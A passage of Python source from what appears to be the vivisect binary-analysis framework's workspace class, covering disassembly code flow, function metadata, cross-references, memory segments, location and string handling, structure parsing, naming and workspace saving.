if bflags & envi.BR_FALL:
continue
self.addXref(va, tova, REF_CODE, bflags)
# Check the instruction for static d-refs
for oidx, o in op.genRefOpers(emu=None):
# FIXME it would be nice if we could just do this one time
# in the emulation pass (or hint emulation that some have already
# been done).
# unfortunately, emulation pass only occurs for code identified
# within a marked function.
# future fix: move this all into VivCodeFlowContext.
# Does the operand touch memory ?
if o.isDeref():
ref = o.getOperAddr(op, None)
if brdone.get(ref, False):
continue
if ref is not None and self.isValidPointer(ref):
# It's a data reference. lets also check if the data is
# a pointer.
self.addXref(va, ref, REF_DATA)
# If we don't already know what type this location is,
# lets make it either a pointer or a number...
if self.getLocation(ref) is None:
offset, _ = self.getByteDef(ref)
val = self.parseNumber(ref, o.tsize)
# We need the size check to avoid treating runs like "aaaa" as pointers; a
# possible refinement is to require that tsize be the target pointer size,
# or one of a set of sizes that the arch defines.
if (self.psize == o.tsize and self.isValidPointer(val)):
self.makePointer(ref, tova=val)
else:
self.makeNumber(ref, o.tsize)
else:
ref = o.getOperValue(op)
if brdone.get(ref, False):
continue
if ref is not None and type(ref) in (int, long) and self.isValidPointer(ref):
self.addXref(va, ref, REF_PTR)
return loc
def _dbgLocEntry(self, va):
"""
Display the human-happy version of a location
"""
loc = self.getLocation(va)
if loc is None:
return 'None'
lva, lsz, ltype, ltinfo = loc
ltvar = loc_lookups.get(ltype)
ltdesc = loc_type_names.get(ltype)
locrepr = '(0x%x, %d, %s, %r) # %s' % (lva, lsz, ltvar, ltinfo, ltdesc)
return locrepr
def updateCallsFrom(self, fva, ncalls):
function = self.getFunction(fva)
prev_call = self.getFunctionMeta(function, 'CallsFrom')
newcall = set(prev_call).union(set(ncalls))
self.setFunctionMeta(function, 'CallsFrom', list(newcall))
def makeCode(self, va, arch=envi.ARCH_DEFAULT, fva=None):
"""
Attempt to begin code-flow based disassembly by
starting at the given va. The va will be made into
an OpcodeLoc and refs will be walked continuing to
make code where possible.
"""
# If this is already a location, bail.
if self.isLocation(va):
return
calls_from = self.cfctx.addCodeFlow(va, arch=arch)
if fva is None:
self.setVaSetRow('CodeFragments', (va, calls_from))
else:
self.updateCallsFrom(fva, calls_from)
return calls_from
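# Hedged usage sketch (the address below is hypothetical): makeCode() kicks off
# code-flow based disassembly, and makeFunction() can then promote the entry.
#
#   calls_from = vw.makeCode(0x401000)
#   vw.makeFunction(0x401000)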
def previewCode(self, va, arch=envi.ARCH_DEFAULT):
'''
Show the repr of an instruction in the current canvas *before* making it a real location
'''
try:
op = self.parseOpcode(va, arch)
if op is None:
self.vprint("0x%x - None" % va)
else:
self.vprint("0x%x (%d bytes) %s" % (va, len(op), repr(op)))
except Exception:
self.vprint("0x%x - decode exception" % va)
logger.exception("preview opcode exception:")
#################################################################
#
# Function API
#
def isFunction(self, funcva):
"""
Return True if funcva is a function entry point.
"""
return self.funcmeta.get(funcva) is not None
def isFunctionThunk(self, funcva):
"""
Return True if funcva is a function thunk
"""
# TODO: could we do more here?
try:
return self.getFunctionMeta(funcva, 'Thunk') is not None
except InvalidFunction:
return False
def getFunctions(self):
"""
Return a list of the function virtual addresses
defined in the workspace.
"""
return self.funcmeta.keys()
def getFunction(self, va):
"""
Return the VA for this function. This will search code blocks
and check for a function va.
"""
if self.funcmeta.get(va) is not None:
return va
cbtup = self.getCodeBlock(va)
if cbtup is not None:
return cbtup[CB_FUNCVA]
return None
def makeFunction(self, va, meta=None, arch=envi.ARCH_DEFAULT):
"""
Do parsing for function information and add a new function doodad.
This function should probably only be called once code-flow for the
area is complete.
"""
if self.isFunction(va):
return
if not self.isValidPointer(va):
raise InvalidLocation(va)
loc = self.getLocation(va)
if loc is not None and loc[L_TINFO] is not None and loc[L_LTYPE] == LOC_OP:
arch = loc[L_TINFO]
realfva = self.cfctx.addEntryPoint(va, arch=arch)
if meta is not None:
for key, val in meta.items():
self.setFunctionMeta(realfva, key, val)
return realfva
def delFunction(self, funcva):
"""
Remove a function, its code blocks and all associated meta
"""
if self.funcmeta.get(funcva) is None:
raise InvalidLocation(funcva)
self._fireEvent(VWE_DELFUNCTION, funcva)
def setFunctionArg(self, fva, idx, atype, aname):
'''
Set the name and type information for a single function argument by index.
Example:
# If we were setting up main...
vw.setFunctionArg(fva, 0, 'int','argc')
vw.setFunctionArg(fva, 1, 'char **','argv')
'''
rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva)
while len(callargs) <= idx:
callargs.append( ('int','arg%d' % len(callargs)) )
callargs[idx] = (atype,aname)
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getFunctionArgs(self, fva):
'''
Returns the list of (typename,argname) tuples which define the
arguments for the specified function.
Example:
for typename,argname in vw.getFunctionArgs(fva):
print('Takes: %s %s' % (typename,argname))
'''
rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva)
return list(callargs)
def getFunctionApi(self, fva):
'''
Retrieve the API definition for the given function address.
Returns: an API tuple (similar to impapi subsystem) or None
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
'''
ret = self.getFunctionMeta(fva, 'api')
if ret is not None:
return ret
defcall = self.getMeta('DefaultCall','unkcall')
return ('void',None,defcall,None,())
def setFunctionApi(self, fva, apidef):
'''
Set a function's API definition.
NOTE: apidef is a tuple similar to the impapi subsystem
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
Example:
apidef = ('int','size','stdcall','getThingSize', ( ('void *','thing'), ))
vw.setFunctionApi(fva, apidef)
'''
self.setFunctionMeta(fva, 'api', apidef)
def getFunctionLocals(self, fva):
'''
Retrieve the list of (fva,spdelta,symtype,syminfo) tuples which
represent the given function's local memory offsets.
'''
if not self.isFunction(fva):
raise InvalidFunction(fva)
return self.localsyms[fva].values()
def getFunctionLocal(self, fva, spdelta):
'''
Retrieve a function local symbol definition as a
(typename,symname) tuple or None if not found.
NOTE: If the local symbol references a LSYM_FARG, this API
will resolve the argument name/type from the function API
definition.
Example:
locsym = vw.getFunctionLocal(fva, 8)
if locsym:
symtype,symname = locsym
print('%s %s;' % (symtype,symname))
'''
locsym = self.localsyms[fva].get(spdelta)
if locsym is None:
return None
fva,spdelta,symtype,syminfo = locsym
if symtype == LSYM_NAME:
return syminfo
if symtype == LSYM_FARG:
apidef = self.getFunctionApi(fva)
if apidef is None:
return None
funcargs = apidef[-1]
if syminfo >= len(funcargs):
return None
return funcargs[syminfo]
raise Exception('Unknown Local Symbol Type: %d' % symtype)
def setFunctionLocal(self, fva, spdelta, symtype, syminfo):
'''
Assign a local symbol within a function (addressed
by delta from initial sp). For each symbol, a "symtype"
and "syminfo" field are used to specify the details.
Example:
# Setup a regular local integer
vw.setFunctionLocal(fva, -4, LSYM_NAME, ('int','x'))
# Setup a link to a stack argument... (ie. i386 cdecl)
vw.setFunctionLocal(fva, 4, LSYM_FARG, 0)
# Setup amd64 style shadow space
vw.setFunctionLocal(fva, 8, LSYM_NAME, ('void *','shadow0'))
'''
metaname = 'LocalSymbol:%d' % spdelta
metavalue = (fva,spdelta,symtype,syminfo)
self.setFunctionMeta(fva, metaname, metavalue)
def setFunctionMeta(self, funcva, key, value):
"""
Set meta key,value pairs that describe a particular
function (by funcva).
Example: vw.setFunctionMeta(fva, "WootKey", 10)
"""
if not self.isFunction(funcva):
raise InvalidFunction(funcva)
self._fireEvent(VWE_SETFUNCMETA, (funcva, key, value))
def getFunctionMeta(self, funcva, key, default=None):
m = self.funcmeta.get(funcva)
if m is None:
raise InvalidFunction(funcva)
return m.get(key, default)
def getFunctionMetaDict(self, funcva):
"""
Return the entire dictionary of function metadata
for the function specified at funcva
"""
return self.funcmeta.get(funcva)
def getFunctionBlocks(self, funcva):
"""
Return the code-block objects for the given function va
"""
ret = self.codeblocks_by_funcva.get(funcva)
if ret is None:
ret = []
return ret
def makeFunctionThunk(self, fva, thname, addVa=True, filelocal=False):
"""
Inform the workspace that a given function is considered a "thunk" to another.
This allows the workspace to process argument inheritance and several other things.
Usage: vw.makeFunctionThunk(0xvavavava, "kernel32.CreateProcessA")
"""
self.checkNoRetApi(thname, fva)
self.setFunctionMeta(fva, "Thunk", thname)
n = self.getName(fva)
base = thname.split(".")[-1]
if addVa:
name = "%s_%.8x" % (base,fva)
else:
name = base
newname = self.makeName(fva, name, filelocal=filelocal, makeuniq=True)
api = self.getImpApi(thname)
if api:
# Set any argument names that are None
rettype,retname,callconv,callname,callargs = api
callargs = [ callargs[i] if callargs[i][1] else (callargs[i][0],'arg%d' % i) for i in range(len(callargs)) ]
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getCallers(self, va):
'''
Get the va for all the callers of the given function/import.
Example:
for va in vw.getCallers( importva ):
dostuff(va)
'''
ret = []
for fromva, tova, rtype, rflags in self.getXrefsTo(va, rtype=REF_CODE):
if rflags & envi.BR_PROC:
ret.append(fromva)
return ret
def getCallGraph(self):
'''
Retrieve a visgraph Graph object representing all known inter procedural
branches in the workspace. Each node has an ID that is the same as the
function va.
Example:
graph = vw.getCallGraph()
'''
return self._call_graph
def getFunctionGraph(self, fva):
'''
Retrieve a code-block graph for the specified virtual address.
Procedural branches (ie, calls) will not be followed during graph
construction.
'''
return viv_codegraph.FuncBlockGraph(self,fva)
def getImportCallers(self, name):
"""
Get a list of all the callers who reference the specified import
by name. (If we detect that the name is actually *in* our workspace,
return those callers too...
"""
ret = []
# If it's a local function, do that too..
fva = self.vaByName(name)
if fva is not None and self.isFunction(fva):
ret = self.getCallers(fva)
for fva in self.getFunctions():
if self.getFunctionMeta(fva, 'Thunk') == name:
ret.extend( self.getCallers( fva ) )
for lva,lsize,ltype,tinfo in self.getLocations(LOC_IMPORT):
if tinfo == name:
ret.extend( self.getCallers( lva ) )
return ret
#################################################################
#
# Xref API
#
def getXrefs(self, rtype=None):
"""
Return the entire list of XREF tuples for this workspace.
"""
if rtype:
return [ xtup for xtup in self.xrefs if xtup[XR_RTYPE] == rtype ]
return self.xrefs
def getXrefsFrom(self, va, rtype=None):
"""
Return a list of tuples for the xrefs whose origin is the
specified va. Optionally, only return xrefs whose type
field is rtype if specified.
example:
for fromva, tova, rtype, rflags in vw.getXrefsFrom(0x41414141):
dostuff(tova)
"""
ret = []
xrefs = self.xrefs_by_from.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def getXrefsTo(self, va, rtype=None):
"""
Get a list of xrefs which point to the given va. Optionally,
specify an rtype to get only xrefs of that type.
"""
# FIXME make xrefs use MapLookup!
ret = []
xrefs = self.xrefs_by_to.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
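# Illustrative sketch: walking xrefs in both directions. Assumes vw is a loaded
# workspace and someva is a defined location.
#
#   for fromva, tova, rtype, rflags in vw.getXrefsTo(someva, rtype=REF_CODE):
#       print("code ref from 0x%.8x" % fromva)
#   for fromva, tova, rtype, rflags in vw.getXrefsFrom(someva):
#       print("refs out to 0x%.8x" % tova)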
def addMemoryMap(self, va, perms, fname, bytes):
"""
Add a memory map to the workspace. This is the *only* way to
get memory backings into the workspace.
"""
self._fireEvent(VWE_ADDMMAP, (va, perms, fname, bytes))
def delMemoryMap(self, va):
raise Exception("delMemoryMap() is not currently supported")
def addSegment(self, va, size, name, filename):
"""
Add a "segment" to the workspace. A segment is generally some meaningful
area inside of a memory map. For PE binaries, a segment and a memory map
are synonymous. However, some platforms (Elf) specify their memory maps
(program headers) and segments (sections) separately.
"""
self._fireEvent(VWE_ADDSEGMENT, (va,size,name,filename))
def getSegment(self, va):
"""
Return the tuple representation of a segment. With the
following format:
(va, size, name, filename)
"""
for seg in self.segments:
sva, ssize, sname, sfile = seg
if va >= sva and va < (sva + ssize):
return seg
return None
def getSegments(self):
"""
Return a list of segment tuples (see getSegment) for all
the segments defined in the current workspace
"""
return list(self.segments)
def addCodeBlock(self, va, size, funcva):
"""
Add a region of code which belongs to a function. Code-block boundaries
are at all logical branches and have more in common with a logical
graph view than function chunks.
"""
loc = self.getLocation( va )
if loc is None:
raise Exception('Adding Codeblock on *non* location?!?: 0x%.8x' % va)
self._fireEvent(VWE_ADDCODEBLOCK, (va,size,funcva))
def getCodeBlock(self, va):
"""
Return the codeblock which contains the given va. A "codeblock"
is a location compatible tuple: (va, size, funcva)
"""
return self.blockmap.getMapLookup(va)
def delCodeBlock(self, va):
"""
Remove a code-block definition from the codeblock namespace.
"""
cb = self.getCodeBlock(va)
if cb is None:
raise Exception("Unknown Code Block: 0x%x" % va)
self._fireEvent(VWE_DELCODEBLOCK, cb)
def getCodeBlocks(self):
"""
Return a list of all the codeblock objects.
"""
return list(self.codeblocks)
def addXref(self, fromva, tova, reftype, rflags=0):
"""
Add an xref with the specified fromva, tova, and reftype
(see REF_ macros). This will *not* trigger any analysis.
Callers are expected to do their own xref analysis (ie, makeCode() etc)
"""
# Architecture gets to decide on actual final VA (ARM/THUMB/etc...)
tova, reftype, rflags = self.arch.archModifyXrefAddr(tova, reftype, rflags)
ref = (fromva, tova, reftype, rflags)
if ref in self.getXrefsFrom(fromva):
return
self._fireEvent(VWE_ADDXREF, (fromva, tova, reftype, rflags))
def delXref(self, ref):
"""
Remove the given xref. This *will* exception if the
xref doesn't already exist...
"""
if ref not in self.getXrefsFrom(ref[XR_FROM]):
raise Exception("Unknown Xref: 0x%x -> 0x%x (rtype: %d, rflags: %d)" % ref)
self._fireEvent(VWE_DELXREF, ref)
def analyzePointer(self, va):
"""
Assume that a new pointer has been created. Check if its
target has a defined location and, if not, try to figure out
what is there. Returns the location type of the location
it recommends or None if a location is already there or it has
no idea.
"""
if self.getLocation(va) is not None:
return None
if self.isProbablyString(va):
return LOC_STRING
elif self.isProbablyUnicode(va):
return LOC_UNI
elif self.isProbablyCode(va):
return LOC_OP
return None
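# Hedged sketch: analyzePointer() only *recommends* a location type; the caller
# still creates the location. For example (targetva is hypothetical):
#
#   ltype = vw.analyzePointer(targetva)
#   if ltype == LOC_STRING:
#       vw.makeString(targetva)
#   elif ltype == LOC_OP:
#       vw.makeCode(targetva)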
def getMeta(self, name, default=None):
return self.metadata.get(name, default)
def setMeta(self, name, value):
"""
Set a meta key,value pair for this workspace.
"""
self._fireEvent(VWE_SETMETA, (name,value))
def markDeadData(self, start, end):
"""
mark a virtual range as dead code.
"""
self.setMeta("deaddata:0x%08x" % start, (start, end))
def unmarkDeadData(self, start, end):
"""
unmark a virtual range as dead code
"""
self._dead_data.remove( (start,end) )
def _mcb_deaddata(self, name, value):
"""
callback from setMeta with namespace
deaddata:
that indicates a range has been added
as dead data.
"""
if value not in self._dead_data:
self._dead_data.append( value )
def isDeadData(self, va):
"""
Return boolean indicating va is in
a dead data range.
"""
for start,end in self._dead_data:
if va >= start and va <= end:
return True
return False
def initMeta(self, name, value):
"""
Set a metakey ONLY if it is not already set. Either
way return the value of the meta key.
"""
m = self.getMeta(name)
if m is None:
self.setMeta(name, value)
m = value
return m
def getTransMeta(self, mname, default=None):
'''
Retrieve a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
return self.transmeta.get(mname,default)
def setTransMeta(self, mname, value):
'''
Store a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
self.transmeta[mname] = value
def castPointer(self, va):
"""
Return the value for a pointer in memory at
the given location. This method does NOT
create a location object or do anything other
than parse memory.
"""
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, self.psize, bigend=self.bigend)
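# Illustrative sketch: castPointer() just parses pointer-width bytes, while
# makePointer() records a LOC_POINTER location (and may follow the target):
#
#   tova = vw.castPointer(ptrva)
#   if vw.isValidPointer(tova):
#       vw.makePointer(ptrva, tova=tova)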
def makePointer(self, va, tova=None, follow=True):
"""
Create a new pointer location in the workspace. If you have already
parsed out the pointers value, you may specify tova to speed things
up.
"""
loctup = self.getLocation(va)
if loctup is not None:
logger.warning("0x%x: Attempting to make a Pointer where another location object exists (of type %r)", va, self.reprLocation(loctup))
return None
psize = self.psize
# Get and document the xrefs created for the new location
if tova is None:
tova = self.castPointer(va)
self.addXref(va, tova, REF_PTR)
ploc = self.addLocation(va, psize, LOC_POINTER)
if follow and self.isValidPointer(tova):
self.followPointer(tova)
return ploc
def makePad(self, va, size):
"""
A special utility for making a pad of a particular size.
"""
return self.addLocation(va, size, LOC_PAD, None)
def makeNumber(self, va, size, val=None):
"""
Create a number location in memory of the given size.
(you may specify val if you have already parsed the value
from memory and would like to save CPU cycles)
"""
return self.addLocation(va, size, LOC_NUMBER, None)
def parseNumber(self, va, size):
'''
Parse a <size> width numeric value from memory at <va>.
Example:
val = vw.parseNumber(0x41414140, 4)
'''
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
def _getSubstrings(self, va, size, ltyp):
# rip through the desired memory range to populate any substrings
subs = set()
end = va + size
for offs in range(va, end, 1):
loc = self.getLocation(offs, range=True)
if loc and loc[L_LTYPE] == LOC_STRING and loc[L_VA] > va:
subs.add((loc[L_VA], loc[L_SIZE]))
if loc[L_TINFO]:
subs = subs.union(set(loc[L_TINFO]))
return list(subs)
def _getStrTinfo(self, va, size, subs):
ploc = self.getLocation(va, range=False)
if ploc:
# the string we're making is a substring of some outer one
# still make this string location, but let the parent know about us too and our
# children as well. Ultimately, the outermost parent should be responsible for
# knowing about all its substrings
modified = False
pva, psize, ptype, pinfo = ploc
if ptype not in (LOC_STRING, LOC_UNI):
return subs
if (va, size) not in pinfo:
modified = True
pinfo.append((va, size))
for sva, ssize in subs:
if (sva, ssize) not in pinfo:
modified = True
pinfo.append((sva, ssize))
if modified:
tinfo = pinfo
else:
tinfo = subs
return tinfo
def makeString(self, va, size=None):
"""
Create a new string location at the given VA. You may optionally
specify size. If size==None, the string will be parsed as a NULL
terminated ASCII string.
Substrings are also handled here. Generally, the idea is:
* if the memory range is completely undefined, we just create a new string at the VA specified (provided that asciiStringSize returns a size greater than 0 or the parameter size is greater than 0)
* if we create a string A at virtual address 0x40 with size 20, and then later a string B at virtual
address 0x44, we won't actually make a new location for the string B, but rather add info to the
tinfo portion of the location tuple for string A, and when trying to retrieve string B via getLocation,
we'll make up a (sort of) fake location tuple for string B, provided that range=True is passed to
getLocation
* if we create string A at virtual address 0x40, and then later a string B at virtual 0x30
that has a size of 16 or more, we overwrite the string A with the location information for string B,
and demote string A to being a tuple of (VA, size) inside of string B's location information.
This method only captures suffixes, but perhaps in the future we'll have symbolik resolution that can
capture true substrings that aren't merely suffixes.
This same formula is applied to unicode detection as well
"""
if size is None:
size = self.asciiStringSize(va)
if size <= 0:
raise Exception("Invalid String Size: %d" % size)
# rip through the desired memory range to populate any substrings
subs = self._getSubstrings(va, size, LOC_STRING)
tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace("\n", "")
self.makeName(va, "str_%s_%.8x" % (m[:16],va))
return self.addLocation(va, size, LOC_STRING, tinfo=tinfo)
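# Hedged example of the substring behavior described above (addresses are
# hypothetical): making the outer string first, then a suffix inside it, records
# the suffix in the outer location's tinfo instead of a second top-level location.
#
#   vw.makeString(0x40, size=20)
#   vw.makeString(0x44)                       # becomes a substring of 0x40
#   loc = vw.getLocation(0x44, range=True)    # synthesized substring tuple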
def makeUnicode(self, va, size=None):
if size is None:
size = self.uniStringSize(va)
if size <= 0:
raise Exception("Invalid Unicode Size: %d" % size)
subs = self._getSubstrings(va, size, LOC_UNI)
tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace("\n","").replace("\0","")
self.makeName(va, "wstr_%s_%.8x" % (m[:16],va))
return self.addLocation(va, size, LOC_UNI, tinfo=tinfo)
def addConstModule(self, modname):
'''
Add constants declared within the named module
to the constants resolver namespace.
Example: vw.addConstModule('vstruct.constants.ntstatus')
'''
mod = self.loadModule(modname)
self.vsconsts.addModule(mod)
def addStructureModule(self, namespace, modname):
'''
Add a vstruct structure module to the workspace with the given
namespace.
Example: vw.addStructureModule('ntdll', 'vstruct.defs.windows.win_5_1_i386.ntdll')
This allows subsequent struct lookups by namespace-qualified names (eg. 'ntdll.<structname>').
'''
mod = self.loadModule(modname)
self.vsbuilder.addVStructNamespace(namespace, mod)
def getStructure(self, va, vstructname):
"""
Parse and return a vstruct object for the given name. This
(like parseOpcode) does *not* require that the location be a struct
and will not create one (use makeStructure).
"""
s = vstruct.getStructure(vstructname)
if s is None:
s = self.vsbuilder.buildVStruct(vstructname)
if s is not None:
bytes = self.readMemory(va, len(s))
s.vsParse(bytes)
return s
def makeStructure(self, va, vstructname, vs=None):
"""
Make a location which is a structure and will be parsed/accessed
by vstruct. You must specify the vstruct name for the structure
you wish to have at the location. Returns a vstruct from the
location.
"""
if vs is None:
vs = self.getStructure(va, vstructname)
self.addLocation(va, len(vs), LOC_STRUCT, vstructname)
# Determine if there are any pointers we need make
# xrefs for...
offset = 0
for p in vs.vsGetPrims():
if isinstance(p, vs_prims.v_ptr):
vptr = p.vsGetValue()
if self.isValidPointer(vptr):
self.addXref(va+offset, vptr, REF_PTR)
offset += len(p)
return vs
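# Illustrative sketch ('ntdll.PEB' assumes the namespace added in the
# addStructureModule() example above): getStructure() only parses, while
# makeStructure() also records a LOC_STRUCT location.
#
#   vs = vw.getStructure(va, 'ntdll.PEB')
#   vw.makeStructure(va, 'ntdll.PEB')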
def getUserStructNames(self):
'''
Retrieve the list of the existing user-defined structure
names.
Example:
for name in vw.getUserStructNames():
print('Structure Name: %s' % name)
'''
return self.vsbuilder.getVStructCtorNames()
def getUserStructSource(self, sname):
'''
Get the source code (as a string) for the given user
defined structure.
Example:
ssrc = vw.getUserStructSource('MyStructureThing')
'''
return self.getMeta('ustruct:%s' % sname)
def setUserStructSource(self, ssrc):
'''
Save the input string as a C structure definition for the
workspace. User-defined structures may then be applied
to locations, or further edited in the future.
Example:
src = "struct woot { int x; int y; };"
vw.setUserStructSource( src )
'''
# First, we make sure it compiles...
ctor = vs_cparse.ctorFromCSource( ssrc )
# Then, build one to get the name from it...
vs = ctor()
cname = vs.vsGetTypeName()
self.setMeta('ustruct:%s' % cname, ssrc)
return cname
def asciiStringSize(self, va):
"""
Return the size (in bytes) of the ascii string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find('\x00', offset)
if foff == -1:
return foff
return (foff - offset) + 1
def uniStringSize(self, va):
"""
Return the size (in bytes) of the unicode string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find('\x00\x00', offset)
if foff == -1:
return foff
return (foff - offset) + 2
def addLocation(self, va, size, ltype, tinfo=None):
"""
Add a location tuple.
"""
ltup = (va, size, ltype, tinfo)
#loc = self.locmap.getMapLookup(va)
#if loc is not None:
#raise Exception('Duplicate Location: (is: %r wants: %r)' % (loc,ltup))
self._fireEvent(VWE_ADDLOCATION, ltup)
return ltup
def getLocations(self, ltype=None, linfo=None):
"""
Return a list of location objects from the workspace
of a particular type.
"""
if ltype is None:
return list(self.loclist)
if linfo is None:
return [ loc for loc in self.loclist if loc[2] == ltype ]
return [ loc for loc in self.loclist if (loc[2] == ltype and loc[3] == linfo) ]
def isLocation(self, va, range=False):
"""
Return True if the va represents a location already.
"""
if self.getLocation(va, range=range) is not None:
return True
return False
def isLocType(self, va, ltype):
"""
You may use this to test if a given VA represents
a location of the specified type.
example:
if vw.isLocType(0x41414141, LOC_STRING):
print("string at: 0x41414141")
"""
tup = self.getLocation(va)
if tup is None:
return False
return tup[L_LTYPE] == ltype
def getLocation(self, va, range=True):
"""
Return the va,size,ltype,tinfo tuple for the given location.
(specify range=True to potentially match a va that is inside
a location rather than the beginning of one, this behavior
only affects strings/substring retrieval currently)
"""
loc = self.locmap.getMapLookup(va)
if not loc:
return loc
if range and loc[L_LTYPE] in (LOC_STRING, LOC_UNI):
# dig into any sublocations that may have been created, trying to find the best match
# possible, where "best" means the substring that both contains the va, and has no substrings
# that contain the va.
if not loc[L_TINFO]:
return loc
subs = sorted(loc[L_TINFO], key=lambda k: k[0], reverse=False)
ltup = loc
for sva, ssize in subs:
if sva <= va < sva + ssize:
ltup = (sva, ssize, loc[L_LTYPE], [])
return ltup
else:
return loc
def getLocationRange(self, va, size):
"""
A "location range" is a list of location tuples where
undefined space *will* be represented by LOC_UNDEF tuples
to provide a complete accounting of linear workspace.
"""
ret = []
endva = va+size
undefva = None
while va < endva:
ltup = self.getLocation(va)
if ltup is None:
if undefva is None:
undefva = va
va += 1
else:
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
undefva = None
ret.append(ltup)
va += ltup[L_SIZE]
# Mop up any hanging undefs
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
return ret
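# Hedged sketch: getLocationRange() fills gaps with LOC_UNDEF tuples, so the
# returned sizes always account for the full requested range.
#
#   for lva, lsize, ltype, tinfo in vw.getLocationRange(va, 0x100):
#       if ltype == LOC_UNDEF:
#           print("undefined: 0x%.8x (%d bytes)" % (lva, lsize))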
def delLocation(self, va):
"""
Delete the given Location object from the binary
(removes any xrefs/etc for the location as well)
This will raise InvalidLocation if the va is not
an exact match for the beginning of a location.
"""
loc = self.getLocation(va)
if loc is None:
raise InvalidLocation(va)
# remove xrefs from this location
for xref in self.getXrefsFrom(va):
self.delXref(xref)
self._fireEvent(VWE_DELLOCATION, loc)
def getRenderInfo(self, va, size):
"""
Get nearly everything needed to render a workspace area
to a display. This function *greatly* speeds up interface
code and is considered "tightly coupled" with the asmview
code. (and is therefore subject to change).
"""
locs = []
funcs = {}
names = {}
comments = {}
extras = {}
for loc in self.getLocationRange(va, size):
lva, lsize, ltype, tinfo = loc
locs.append(loc)
name = self.getName(lva)
isfunc = self.isFunction(lva)
cmnt = self.getComment(lva)
if name is not None:
names[lva] = name
if isfunc:
funcs[lva] = True
if cmnt is not None:
comments[lva] = cmnt
if ltype == LOC_UNDEF:
# Expand out all undefs so we can send all the info
endva = lva + lsize
while lva < endva:
uname = self.getName(lva)
ucmnt = self.getComment(lva)
if uname is not None:
names[lva] = uname
if ucmnt is not None:
comments[lva] = ucmnt
#ret.append(((lva, 1, LOC_UNDEF, None), self.getName(lva), False, self.getComment(lva)))
lva += 1
elif ltype == LOC_OP:
extras[lva] = self.parseOpcode(lva)
elif ltype == LOC_STRUCT:
extras[lva] = self.getStructure(lva, tinfo)
return locs, funcs, names, comments, extras
def getPrevLocation(self, va, adjacent=True):
"""
Get the previous location behind this one. If adjacent
is true, only return a location which is IMMEDIATELY behind
the given va, otherwise search backward for a location until
you find one or hit the edge of the segment.
"""
va -= 1
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
if adjacent:
return None
va -= 1
while va > 0:
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
va -= 1
return None
def vaByName(self, name):
return self.va_by_name.get(name, None)
def getLocationByName(self, name):
"""
Return a location object by the name of the
location.
"""
va = self.vaByName(name)
if va is None:
raise InvalidLocation(0, "Unknown Name: %s" % name)
return self.getLocation(va)
def getNames(self):
"""
Return a list of tuples containing (va, name)
"""
return self.name_by_va.items()
def getName(self, va, smart=False):
'''
Returns the name of the specified virtual address (or None).
Smart mode digs beyond simple name lookups, as follows:
If va falls within a known function in the workspace, we return "funcname+<delta>".
If not, and the va falls within a mapped binary, we return "filename+<delta>"
'''
name = self.name_by_va.get(va)
if name is not None or not smart:
return name
# TODO: by previous symbol?
# by function
baseva = self.getFunction(va)
basename = self.name_by_va.get(baseva, None)
if self.isFunction(va):
basename = 'sub_0%x' % va
# by filename
if basename is None:
basename = self.getFileByVa(va)
if basename is None:
return None
baseva = self.getFileMeta(basename, 'imagebase')
delta = va - baseva
if delta:
pom = ('', '+')[delta>0]
name = "%s%s%s" % (basename, pom, hex(delta))
else:
name = basename
return name
def makeName(self, va, name, filelocal=False, makeuniq=False):
"""
Set a readable name for the given location by va. There
*must* be a Location defined for the VA before you may name
it. You may set a location's name to None to remove a name.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
default behavior is to fail on duplicate (False).
"""
if filelocal:
segtup = self.getSegment(va)
if segtup is None:
self.vprint("Failed to find file for 0x%.8x (%s) (and filelocal == True!)" % (va, name))
if segtup is not None:
fname = segtup[SEG_FNAME]
if fname is not None:
name = "%s.%s" % (fname, name)
oldva = self.vaByName(name)
# If that's already the name, ignore the event
if oldva == va:
return
if oldva is not None:
if not makeuniq:
raise DuplicateName(oldva, va, name)
else:
logger.debug('makeName: %r already lives at 0x%x', name, oldva)
# tack a number on the end
index = 0
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
while self.vaByName(newname) not in (None, newname):
# if we run into the va we're naming, that's the name still
if newoldva == va:
return newname
logger.debug('makeName: %r already lives at 0x%x', newname, newoldva)
index += 1
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
name = newname
self._fireEvent(VWE_SETNAME, (va,name))
return name
def saveWorkspace(self, fullsave=True):
if self.server is not None:
return
modname = self.getMeta("StorageModule")
filename = self.getMeta("StorageName")
if modname is None:
raise Exception("StorageModule not specified!")
if filename is None:
raise Exception("StorageName not specified!")
# Usually this is "vivisect.storage.basicfile"
mod = self.loadModule(modname)
# If they specified a full save, *or* this event list
# has never been saved before, do a full save.
if fullsave:
mod.saveWorkspace(self, filename)
else:
mod.saveWorkspaceChanges(self, filename)
self._createSaveMark()
def loadFromFd(self, fd, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file descriptor and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
Returns file md5
"""
mod = None
fd.seek(0)
if fmtname is None:
bytes = fd.read(32)
